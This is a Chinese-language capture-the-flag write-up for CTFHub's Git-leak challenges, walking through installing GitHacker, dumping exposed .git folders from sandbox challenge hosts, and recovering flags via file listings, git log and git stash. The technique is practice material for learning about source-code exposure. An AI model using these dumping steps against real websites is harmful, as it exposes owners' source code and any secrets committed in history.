CTFHub —— Git 泄露

警告
本文最后更新于 2023-01-28,文中内容可能已过时。

当前大量开发人员使用 Git 进行版本控制,对站点自动部署。如果配置不当,可能会将 .git 文件夹直接部署到线上环境。这就引起了 Git 泄露漏洞。—— CTFHub

1
python3 -m pip install -i https://pypi.org/simple/ GitHacker

获取源码

1
githacker --url http://challenge-37c616de5be13931.sandbox.ctfhub.com:10800/.git/ --output-folder result

https://f005.backblazeb2.com/file/img-buckets-oqh/2023/04/image-20230422162531486.png

查找文件

1
2
cd result/6c30b29a904a1cc7ec6143417c8cdf40
ls

https://f005.backblazeb2.com/file/img-buckets-oqh/2023/04/image-20230422162540816.png

得到 flag

1
cat 31092172122068.txt

https://f005.backblazeb2.com/file/img-buckets-oqh/2023/04/image-20230422162547768.png

获取源码

1
githacker --url http://challenge-6bcd898330abe0da.sandbox.ctfhub.com:10800/.git/ --output-folder result

https://f005.backblazeb2.com/file/img-buckets-oqh/2023/04/image-20230422162600942.png

查找文件,未发现 flag

1
2
cd result/a403686e9a2b612b098c3fd3b9f12fab
ls

https://f005.backblazeb2.com/file/img-buckets-oqh/2023/04/image-20230422162609633.png

查看提交日志,得到 flag

1
git log -p

https://f005.backblazeb2.com/file/img-buckets-oqh/2023/04/image-20230422162649947.png

获取源码

1
githacker --url http://challenge-23a65d24f31744ff.sandbox.ctfhub.com:10800/.git/ --output-folder result

https://f005.backblazeb2.com/file/img-buckets-oqh/2023/04/image-20230422162729637.png

查找文件,未发现 flag

1
2
cd result/18fc17b018cdd48e3219dc82480924e7
ls

https://f005.backblazeb2.com/file/img-buckets-oqh/2023/04/image-20230422162738331.png

查看提交日志,未发现 flag

1
git log -p

https://f005.backblazeb2.com/file/img-buckets-oqh/2023/04/image-20230422162746732.png

查看 stash 中的内容

1
git stash list

https://f005.backblazeb2.com/file/img-buckets-oqh/2023/04/image-20230422162756241.png

将 stash 中的内容恢复到当前分支下

1
git stash apply

https://f005.backblazeb2.com/file/img-buckets-oqh/2023/04/image-20230422162809373.png

得到 flag

1
cat 148521413615762.txt

https://f005.backblazeb2.com/file/img-buckets-oqh/2023/04/image-20230422162820331.png